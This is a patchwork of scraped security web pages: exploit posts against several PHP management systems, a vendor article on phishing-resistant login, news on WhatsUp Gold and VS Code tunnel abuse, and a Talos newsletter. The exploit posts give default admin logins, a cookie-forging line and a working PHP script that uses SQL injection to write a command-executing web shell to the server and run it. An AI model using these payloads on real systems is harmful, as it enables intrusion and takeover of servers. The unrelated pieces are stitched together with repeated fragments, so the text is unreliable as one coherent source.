Car Washing Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Car Washing Management System 1.0 Insecure Settings Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/car-washing-management-system-using-php-and-mysql/                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: Test@123[+] http://127.0.0.1/agms/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Car Washing Management System 1.0 Insecure Settings

Bus Pass Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Bus Pass Management System 1.0 Insecure Settings Vulnerability                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql/                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: Test@123[+] http://127.0.0.1/buspassms/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Bus Pass Management System 1.0 Insecure Settings

BP Monitoring Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : BP Monitoring Management System 1.0 Insecure Settings Vulnerability                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/bp-monitoring-management-system-using-php-and-mysql/                                        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: john@test.com      Password: Test@123[+] http://127.0.0.1/bpmms/edit-family-member.php?fmid=1Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

BP Monitoring Management System 1.0 Insecure Settings

Beauty Parlour and Saloon Management System version 1.1 suffers from an insecure cooking handling vulnerability.

**Beauty Parlour And Saloon Management System 1.1 Insecure Cookie Handling**

Posted Sep 13, 2024

Authored by indoushka

Beauty Parlour and Saloon Management System version 1.1 suffers from an insecure cooking handling vulnerability.

tags | exploit

SHA-256 | 4c0788f43b5ea94beac369a15563afe012375eb20121975b115510c93def998e

Download | Favorite | View

**Beauty Parlour And Saloon Management System 1.1 Insecure Cookie Handling**

    ====================================================================================================================================| # Title     : Beauty Parlour & Saloon Management System 1.1 Insecure Cookie Handling Vulnerability                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The default username is admin & The chosen password is user123[+] use payload : document.cookie = "username=user123; path=/; secure; HttpOnly; SameSite=Lax";[+] Refresh the page http://127.0.0.1/studentms/admin/login.php or go to http://127.0.0.1/studentms/admin/dashboard.php Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,753)
*   Arbitrary (17,058)
*   BBS (2,859)
*   Bypass (1,912)
*   CGI (1,047)
*   Code Execution (7,889)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,422)
*   DoS (25,235)
*   Encryption (2,394)
*   Exploit (54,198)
*   File Inclusion (4,273)
*   File Upload (1,011)
*   Firewall (822)
*   Info Disclosure (2,913)
*   Intrusion Detection (918)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,270)
*   Local (14,848)
*   Magazine (587)
*   Overflow (13,212)
*   Perl (1,435)
*   PHP (5,262)
*   Proof of Concept (2,406)
*   Protocol (3,749)
*   Python (1,655)
*   Remote (31,853)
*   Root (3,671)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,046)
*   Shell (3,303)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,711)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (673)
*   Vulnerability (33,063)
*   Web (10,135)
*   Whitepaper (3,783)
*   x86 (970)
*   XSS (18,289)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,119)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,136)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,775)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,828)
*   UNIX (9,454)
*   UnixWare (188)
*   Windows (6,766)
*   Other

Beauty Parlour And Saloon Management System 1.1 Insecure Cookie Handling

Auto/Taxi Stand Management System version 1.0 suffers from a php code injection vulnerability.

    =============================================================================================================================================| # Title     : Auto/Taxi Stand Management System 1.0 php code injection Vulnerability                                                      || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/auto-taxi-stand-management-system-using-php-and-mysql/                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload inject php code contains a back door.[+] Line 16 + 19 Set your Target.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php[+] payload :<?php// المكتبات المطلوبةfunction send_request($url, $data) {    $options = [        'http' => [            'header'  => "Content-Type: application/x-www-form-urlencoded\r\n",            'method'  => 'POST',            'content' => http_build_query($data),        ]    ];    $context  = stream_context_create($options);    return file_get_contents($url, false, $context);}// تحديد URL ثابت$url = 'http://localhost/atsms/';// مسار ثابت لرفع الملف$path = 'C:\www\atsms\uploaded.php';$path = str_replace("\\", "\\\\", $path);// حمولة الباب الخلفي$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';// إرسال ملف PHP يحتوي على الباب الخلفي$payload = [    'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",    'password' => 'test',    'login' => ''];send_request($url . "/admin/index.php", $payload);echo "[+] PHP backdoor uploaded successfully at $path\n";// تنفيذ ملف PHP المرفوع واختبار الباب الخلفي$response = file_get_contents($url . "uploaded.php?cmd=whoami");echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Auto/Taxi Stand Management System 1.0 PHP Code Injection

Art Gallery Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Art Gallery Management System 1.0 Insecure Settings Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/art-gallery-management-system-using-php-and-mysql/                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: john@test.com      Password: Test@123[+] http://127.0.0.1/agms/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Art Gallery Management System 1.0 Insecure Settings

Even as cyber threats become increasingly sophisticated, the number one attack vector for unauthorized access remains phished credentials (Verizon DBIR, 2024). Solving this problem resolves over 80% of your corporate risk, and a solution is possible. 
However, most tools available on the market today cannot offer a complete defense against this attack vector because they were architected to

Even as cyber threats become increasingly sophisticated, the number one attack vector for unauthorized access remains phished credentials (Verizon DBIR, 2024). Solving this problem resolves over 80% of your corporate risk, and a solution is possible.

However, most tools available on the market today cannot offer a complete defense against this attack vector because they were architected to deliver probabilistic defenses. Learn more about the characteristics of Beyond Identity that allow us to deliver deterministic defenses.

****The Challenge: Phishing and Credential Theft****

Phishing attacks trick users into revealing their credentials via deceptive sites or messages sent via SMS, email, and/or voice calls. Traditional defenses, such as end-user training or basic multi-factor authentication (MFA), lower the risk at best but cannot eliminate it. Users may still fall prey to scams, and stolen credentials can be exploited. Legacy MFA is a particularly urgent problem, given that attackers now bypass MFA at scale prompting NIST, CISA, OMB, and NYDFS to issue guidances for phishing-resistant MFA.

****Beyond Identity's Approach: Deterministic Security******Eliminate Phishing**

Shared secrets, like passwords and OTPs, are inherently vulnerable because they can be intercepted or stolen. Beyond Identity uses public-private key cryptography, or passkeys, to avoid these risks and never falls back to phishable factors like OTP, push notifications, or magic links.

While public key cryptography is robust, the safety of private keys is crucial. Beyond Identity utilizes secure enclaves—specialized hardware components that safeguard private keys and prevent unauthorized access or movement. By ensuring all authentications are phishing-resistant and leveraging device-bound, hardware-backed credentials, Beyond Identity provides assurance against phishing attacks.

**Prevent Verifier Impersonation**

Recognizing legitimate links is impossible for human beings. To address this, Beyond Identity authentication relies on a Platform Authenticator, which verifies the origin of access requests. This method helps prevent attacks that rely on mimicking legitimate sites.

**Eliminate Credential Stuffing**

Credential stuffing is an attack where bad actors test stolen username and password pairs to attempt to gain access. Typically, the attack is carried out in an automated manner.

Beyond Identity addresses this by eliminating passwords entirely from the authentication process. Our passwordless, phishing-resistant MFA allows users to log in with a touch or glance and supports the broadest range of operating systems on the market, including Windows, Android, macOS, iOS, Linux, and ChromeOS, so users can log in seamlessly no matter what device they prefer to use.

**Eliminate Push Bombing Attacks**

Push bombing attacks flood users with excessive push notifications, leading to accidental approvals of unauthorized access. Beyond Identity mitigates this risk by not relying on push notifications.

Additionally, our phishing-resistant MFA enables device security checks on every device, managed or unmanaged, using natively collected and integrated third-party risk signals so you can ensure device compliance regardless of the device.

**Enforce Device Security Compliance**

During authentication, it's not just the user that's logging in, it's also their device. Beyond Identity is the only IAM solution on the market that delivers fine-grained access control that accounts for real-time device risk at the time of authentication and continuously during active sessions.

The first benefit of a platform authenticator is the ability to provide verifier impersonation resistance. The second benefit is that, as an application that lives on the device, it can provide real-time risk data about the device, such as firewall enabled, biometric-enabled, disk encryption enabled, and more.

With the Beyond Identity Platform Authenticator in place, you can have guarantees of user identity with phishing-resistant authentication and enforce security compliance on the device requesting access.

**Integrating Risk Signals for Adaptive Access**

Given the proliferation of security tools, risk signals can come from various disparate sources ranging from mobile device management (MDM), endpoint detection and response (EDR), Zero Trust Network Access (ZTNA), and Secure Access Service Edge (SASE) tools. Adaptive, risk-based access is only as strong as the breadth, freshness, and comprehensiveness of risk signals that are fed into its policy decisions.

Beyond Identity provides a flexible integration architecture that prevents vendor lock-in and reduces the complexity of admin management and maintenance. Additionally, our policy engine allows for continuous authentication, so you can enforce comprehensive risk compliance even during active sessions.

**Ready to experience phishing-resistant security?**

Don't let outdated security measures leave your organization vulnerable when there are solutions available that can dramatically reduce your threat landscape and eliminate credential theft.

With Beyond Identity, you can safeguard access to your critical resources with deterministic security. Get in touch for a personalized demo to see firsthand how the solution works and understand how we deliver our security guarantees.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Say Goodbye to Phishing: Must-Haves to Eliminate Credential Theft

Malicious actors are likely leveraging publicly available proof-of-concept (PoC) exploits for recently disclosed security flaws in Progress Software WhatsUp Gold to conduct opportunistic attacks.
The activity is said to have commenced on August 30, 2024, a mere five hours after a PoC was released for CVE-2024-6670 (CVSS score: 9.8) by security researcher Sina Kheirkhah of the Summoning Team, who

Software Security / Threat Intelligence

Malicious actors are likely leveraging publicly available proof-of-concept (PoC) exploits for recently disclosed security flaws in Progress Software WhatsUp Gold to conduct opportunistic attacks.

The activity is said to have commenced on August 30, 2024, a mere five hours after a PoC was released for CVE-2024-6670 (CVSS score: 9.8) by security researcher Sina Kheirkhah of the Summoning Team, who is also credited with discovering and reporting CVE-2024-6671 (CVSS scores: 9.8).

Both the critical vulnerabilities, which allow an unauthenticated attacker to retrieve a user's encrypted password, were patched by Progress in mid-August 2024.

"The timeline of events suggests that despite the availability of patches, some organizations were unable to apply them quickly, leading to incidents almost immediately following the PoC's publication," Trend Micro researchers Hitomi Kimura and Maria Emreen Viray said in a Thursday analysis.

The attacks observed by the cybersecurity company involve bypassing WhatsUp Gold authentication to exploit the Active Monitor PowerShell Script and ultimately download various remote access tools for gaining persistence on the Windows host.

This includes Atera Agent, Radmin, SimpleHelp Remote Access, and Splashtop Remote, with both Atera Agent and Splashtop Remote installed by means of a single MSI installer file retrieved from a remote server.

"The polling process NmPoller.exe, the WhatsUp Gold executable, seems to be able to host a script called Active Monitor PowerShell Script as a legitimate function," the researchers explained. "The threat actors in this case chose it to perform for remote arbitrary code execution."

While no follow-on exploitation actions have been detected, the use of several remote access software points to the involvement of a ransomware actor.

This is the second time security vulnerabilities in WhatsUp Gold have been actively weaponized in the wild. Early last month, the Shadowserver Foundation said it had observed exploitation attempts against CVE-2024-4885 (CVSS score: 9.8), another critical bug that was resolved by Progress in June 2024.

The disclosure comes weeks after Trend Micro also revealed that threat actors are exploiting a now-patched security flaw in Atlassian Confluence Data Center and Confluence Server (CVE-2023-22527, CVSS score: 10.0) to deliver the Godzilla web shell.

"The CVE-2023-22527 vulnerability continues to be widely exploited by a wide range of threat actors who abuse this vulnerability to perform malicious activities, making it a significant security risk to organizations worldwide," the company said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Progress WhatsUp Gold Exploited Just Hours After PoC Release for Critical Flaw

A technique to abuse Microsoft's built-in source code editor has finally made it into the wild, thanks to China's Mustang Panda APT.

Source: Postmodern Studio via Alamy Stock Photo

A Chinese state-aligned espionage group has become the first documented threat actor to weaponize a known exploit in VS Code in a malicious attack.

Visual Studio Code, or VS Code, is Microsoft's free source code editor for Windows, Linux, and macOS. According to Stack Overflow's 2023 survey of 86,544 developers, it's the most popular integrated development environment (IDE) among both new (78%) and professional developers (74%), by some distance. The next most popular IDE, Visual Studio, was used by 28% of respondents.

In September 2023, a threat researcher described how an attacker could take advantage of a VS Code feature called "Tunnel" to gain initial access to a target's environment. Initially, the tactic was just fodder for red teaming. Now, according to Palo Alto Networks' Unit 42, China's Mustang Panda (aka Stately Taurus, Bronze President, RedDelta, Luminous Moth, Earth Preta, and Camaro Dragon) has used it in an espionage attack against a government entity in southeast Asia.

"The technique described requires an attacker to have previously gained code execution privileges on a target machine," a Microsoft spokesperson tells Dark Reading. "As a security best practice, we encourage customers to practice good computing habits online, including exercising caution when clicking on links to web pages or opening unknown files."

**Turning VS Code Into a Reverse Shell**

"One of the worst fears as a cybersecurity expert is detecting and preventing a signed reverse shell binary," Truvis Thornton wrote, a whole year prior to Unit 42's latest research. "Guess what? Microsoft gladly gave us one."

First introduced in July 2023, VS Code Tunnel allows users to share their VS Code environments on the open Web, and only requires authentication through a GitHub account.

An attacker with their victim's GitHub credentials could do damage, but much worse is the fact that one can remotely install a portable version of VS Code on a targeted machine. Because it's a legitimate signed binary, it will not be flagged as suspicious by security software.

And yet, it will walk and talk like a reverse shell. By running the command "code.exe tunnel," the attacker opens a GitHub authentication page, which they can log into with their own account. Then they're redirected to a VS Code environment connected to their target's system, and free to execute commands and scripts and introduce new files at will.

Mustang Panda — a 12-year-old advanced persistent threat (APT) known for espionage against governments, nongovernmental organizations (NGOs), and religious groups in Asia and Europe — used this playbook to perform reconnaissance against its target, drop malware, and, most importantly for its purposes, exfiltrate sensitive data.

**How to Deal with VSCode**

"While the abuse of VSCode is concerning, in our opinion, it is not a vulnerability," Assaf Dahan, director of threat research for Unit 42, clarifies. Instead, he says, "It's a legitimate feature that was abused by threat actors, as often happens with many legitimate software (take lolbins, for example)."

And there are a number of ways organizations can protect against a bring-your-own-VSCode attack. Besides hunting for indicators of compromise (IoCs), he says, "It's also important to consider whether the organization would want to limit or block the use of VSCode on endpoints of employees that are not developers or do not require the use of this specific app. That can reduce the attack surface." 

"Lastly, consider limiting access to the VSCode tunnel domains '.tunnels.api.visualstudio\[.\]com' or '.devtunnels\[.\]ms' to users with a valid business requirement. Notice that these domains are legitimate and are not malicious, but limiting access to them will prevent the feature from working properly and consequently make it less attractive for threat actors," he adds.

**A Second, Overlapping Attack**

While investigating the Mustang Panda attack, Unit 42 came across a second threat cluster occupying the same target's systems.

In this case, the attacker abused imecmnt.exe — a legitimate and signed file associated with Microsoft's Input Method Editor (IME), used for generating text in languages not conducive to the QWERTY keyboard — with some dynamic link library (DLL) sideloading. The file they dropped, ShadowPad, is a 7-year-old modular backdoor popular among Chinese threat actors.

This compromise occurred at the same time as the VS Code exploitation, often on the same endpoints, and the overlaps didn't end there. Still, researchers couldn't say for certain whether this second cluster of malicious activity could be attributed to Mustang Panda. "There could also be other possible scenarios to explain this connection," they wrote. "For example, it could be a joint effort between two Chinese APT groups or perhaps two different groups piggybacking on each other's access."

Don't miss the latest Dark Reading Confidential podcast, where we talk to two cybersecurity professionals who were arrested in Dallas County, Iowa, and forced to spend the night in jail — just for doing their pen-testing jobs. Listen now!

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Microsoft VS Code Undermined in Asian Spy Attack

A June report from CyberSeek found that there are only enough skilled workers to fill 85 percent of cybersecurity jobs in America.

Thursday, September 12, 2024 14:00

I have written about the dreaded “cybersecurity skills gap” more times than I can remember in this newsletter, but I feel like it’s time to revisit this topic again.  

That’s because the White House announced a new initiative last week for the U.S. government called the “Service for America” initiative designed to train new workers in the cybersecurity field. This measure directs U.S. federal agencies to help recruit and prepare Americans for jobs in cybersecurity and AI by removing certain degree requirements and emphasizing skills-based hiring. This means, hopefully, more educational resources for people looking to break into cybersecurity. 

On its face, I’m all in favor of this. I did eventually go back to school to get my associate's degree in cybersecurity, but much of what I’ve learned about this field has been from working at Talos and spending time around my talented and intelligent colleagues, many of whom did not go to college for cybersecurity.  

The U.S. government also has separate initiatives to support neurodivergent candidates who want to work in security, as well as those who are blind and visually impaired. 

My concern is that, even if we do train these employees and give them the proper skills, it’s on companies to eventually hire them.  

A June report from CyberSeek found that there are only enough skilled workers to fill 85 percent of cybersecurity jobs in America. Yet hiring in the industry has remained flat, according to a soon-to-be-released report from cybersecurity non-profit ISC2. This year, the global security workforce is estimated to be 5.5 million, which is only a 0.1 percent increase year over year, according to the report. 

Among the more than 15,000 cybersecurity practitioners from around the globe who responded to the study, 38 percent of respondents said their organizations had experienced a cybersecurity hiring freeze over the past year, up 8 percent from 2023. Thirty-seven percent of respondents reported budget cuts to the security program, and another 25 percent said their teams had experienced layoffs.  

That same CyberSeek report also found that, in the U.S., the amount of cybersecurity-related job postings decreased by 29 percent year-over-year. 

So as these skills gap-closing programs begin, we need to be thinking about what skills, exactly, managers want their workers to be trained in. There is obviously some sort of disconnect here between the people who want to work in security compared to the companies or managers who want to hire them. Or there just simply isn’t enough money to go around right now to handle staffing up cybersecurity teams, and that’s just the reality of the current economy in the U.S. and globally.  

I’m not saying this to discourage anyone from entering the security space or spread doom and gloom. But I do think it’s important to acknowledge that there are many already skilled and trained workers who simply cannot find work or are treading water throwing dozens of applications at the wall to see what sticks. 

I’ve seen too many people posting on LinkedIn recently looking for a cybersecurity job to think that the solution to bolstering security is getting \*another\* worker in with the same skillset to compete for the same job opening as someone who’s been in the industry for 10 years. 

**The one big thing **

Talos recently uncovered a new threat called “DragonRank” that primarily targets countries in Asia — and a few in Europe — operating PlugX and BadIIS for search engine optimization (SEO) rank manipulation. DragonRank exploits targets’ web application services to deploy a web shell and utilizes it to collect system information and launch malware such as PlugX and BadIIS, running various credential-harvesting utilities. Their PlugX not only used familiar sideloading techniques, but the Windows Structured Exception Handling (SEH) mechanism ensures that the legitimate file can load the PlugX without raising suspicion. 

**Why do I care? **

This group compromises Windows Internet Information Services (IIS) servers hosting corporate websites, with the intention of implanting the BadIIS malware. BadIIS is malware used to manipulate search engine crawlers and disrupt the SEO of the affected sites. With those compromised IIS servers, DragonRank can distribute the scam website to unsuspecting users. DragonRank engages in SEO manipulation by altering or exploiting search engine algorithms to improve a website's ranking in search results. They conduct these attacks to drive traffic to malicious sites, increase the visibility of fraudulent content, or disrupt competitors by artificially inflating or deflating rankings. These attacks can harm a company's online presence, lead to financial losses, and damage its reputation by associating the brand with deceptive or harmful practices. The actor then takes these compromised websites and promotes them, effectively turning these sites into platforms for scam operations. 

**So now what? **

Talos released a new Snort rule set and several ClamAV signatures to detect and block the malware used in these attacks. Talos has confirmed more than 35 IIS servers had been compromised and deployed the BadIIS malware across a diverse array of geographic regions, including Thailand, India, Korea, Belgium, Netherlands and China in this campaign, so it’s clearly still active and potentially growing. 

**Top security headlines of the week **

**A new type of attack called “RAMBO” could allow adversaries to steal data over air-gapped networks with RAM radio signals.** An Israeli academic researcher recently announced the discovery of RAMBO (Radiation of Air-gapped Memory Bus for Offense), in which an attacker could generate electromagnetic radiation from a device’s RAM to send data from air-gapped computers. Air-gapped systems are otherwise offline networks that are extremely isolated, often used in critical environments like government agencies, weapons systems and nuclear power stations. While RAMBO does not pose a threat for any hacker with access to the internet, it could open the door for insider threats with access to the network to deploy malware through physical media like USB drives or supply chain attacks. RAMBO could allow attackers to seal encoded files, encryption keys, images, keystrokes and biometric information from these systems at a rate of 1,000 bits per second. Researchers conducted tests into these types of attacks over distances of up to 23 feet. A technical paper published on the topic includes several potential mitigations, including RAM jamming, external EM jamming and Faraday enclosures around potentially targeted systems. (Bleeping Computer, SecurityWeek) 

**Commercial spyware makers are still finding ways to bypass government sanctions and, in some cases, have made their tools harder to detect.** A new report from the Atlantic Council found that “Most available evidence suggests that spyware sales are a present reality and likely to continue.” The report specifically highlights increased activity from Intellexa and the NSO Group, two companies known for creating and selling spyware tools that have been targeted over the past few years by international sanctions. These companies, and specifically Intellexa, have found ways to work around sanctions by restructuring their businesses with subsidiaries, partners and other relationships spread across multiple geographic areas. Intellexa is known for creating the Predator spyware, while the NSO Group is infamous for the Pegasus spyware. Both pieces of software often target high-risk individuals, sometimes by governments, such as journalists, politicians and activists. Security researchers also recently found that Intellexa has established new infrastructure in the Democratic Republic of the Congo and Angola, making “it more difficult for researchers and cybersecurity defenders to track the spread of Predator.” (Dark Reading, The Register) 

**Several Western intelligence agencies have formally charged the Russian GRU for carrying out cyber attacks against Ukraine designed to disrupt aid efforts.** Government agencies in the U.S., U.K. and several other countries blamed Unit 29155, which has been linked to past espionage campaigns, with targeting government and civilian agencies and civil society organizations in Western Europe, the EU and NATO after Russia invaded Ukraine in 2022. Intelligence agencies in the Netherlands, Czech Republic, Germany, Estonia, Latvia, Canada and Australia all signed the declaration. They also formally blamed Unit 29155 for the WhisperGate campaign, a coordinated attack on Ukrainian government agencies in January 2022 that seemed to set the stage for a physical ground invasion. The announcement stated that WhisperGate has since been used to “scout and disrupt” aid deliveries to Ukraine. When Talos first reported on WhisperGate in 2022, our researchers stated that “attackers used stolen credentials in the campaign and they likely had access to the victim network for months before the attack, a typical characteristic of sophisticated advanced persistent threat (APT) operations.” (Reuters, BBC) 

**Can’t get enough Talos? **

*   The 2024 Threat Landscape State of Play 
*   Vulnerability in Tencent WeChat custom browser could lead to remote code execution 
*   Watch our new documentary, "The Light We Keep: A Project PowerUp Story" 
*   Vulnerability in Acrobat Reader could lead to remote code execution; Microsoft patches information disclosure issue in Windows API 
*   Four zero-days included in group of 79 vulnerabilities Microsoft discloses, including one with 9.8 severity score 

**Upcoming events where you can find Talos **

**LABScon** **(Sept. 18 - 21)**  

_Scottsdale, Arizona_ 

**VB2024** **(Oct. 2 - 4)** 

_Dublin, Ireland_ 

**MITRE ATT&CKcon 5.0** **(Oct. 22 - 23)** 

_McLean, Virginia and Virtual_

Nicole Hoffman and James Nutland will provide a brief history of Akira ransomware and an overview of the Linux ransomware landscape. Then, morph into action as they take a technical deep dive into the latest Linux variant using the ATT&CK framework to uncover its techniques, tactics and procedures.

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca   
**MD5:** 71fea034b422e4a17ebb06022532fdde   
**Typical Filename:** VID001.exe   
**Claimed Product:** N/A   
**Detection Name:** RF.Talos.80 

**SHA 256:** 3a2ea65faefdc64d83dd4c06ef617d6ac683f781c093008c8996277732d9bd66   
**MD5:** 8b84d61bf3ffec822e2daf4a3665308c   
**Typical Filename:** RemComSvc.exe   
**Claimed Product:** N/A   
**Detection Name:** W32.3A2EA65FAE-95.SBX.TG 

**SHA 256:** 35dcf857f0bb2ea75bf4582b67a2a72d7e21d96562b4c8a61b5d598bd2327c2c   
**MD5:** fab8aabfdabe44c9a1ffa779fda207db   
**Typical Filename:** ACenter.exe   
**Claimed Product:** Aranda AGENT   
**Detection Name:** Win.Trojan.Generic::tg.talos  

**SHA 256:** 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647   
**MD5:** bbcf7a68f4164a9f5f5cb2d9f30d9790   
**Typical Filename:** bbcf7a68f4164a9f5f5cb2d9f30d9790.vir   
**Claimed Product:** N/A   
**Detection Name:** Win.Dropper.Scar::1201 

**SHA 256:** 5e537dee6d7478cba56ebbcc7a695cae2609010a897d766ff578a4260c2ac9cf   
**MD5:** 2cfc15cb15acc1ff2b2da65c790d7551   
**Typical Filename:** rcx4d83.tmp   
**Claimed Product:** N/A     
**Detection Name:** Win.Dropper.Pykspa::tpd

Tag

#windows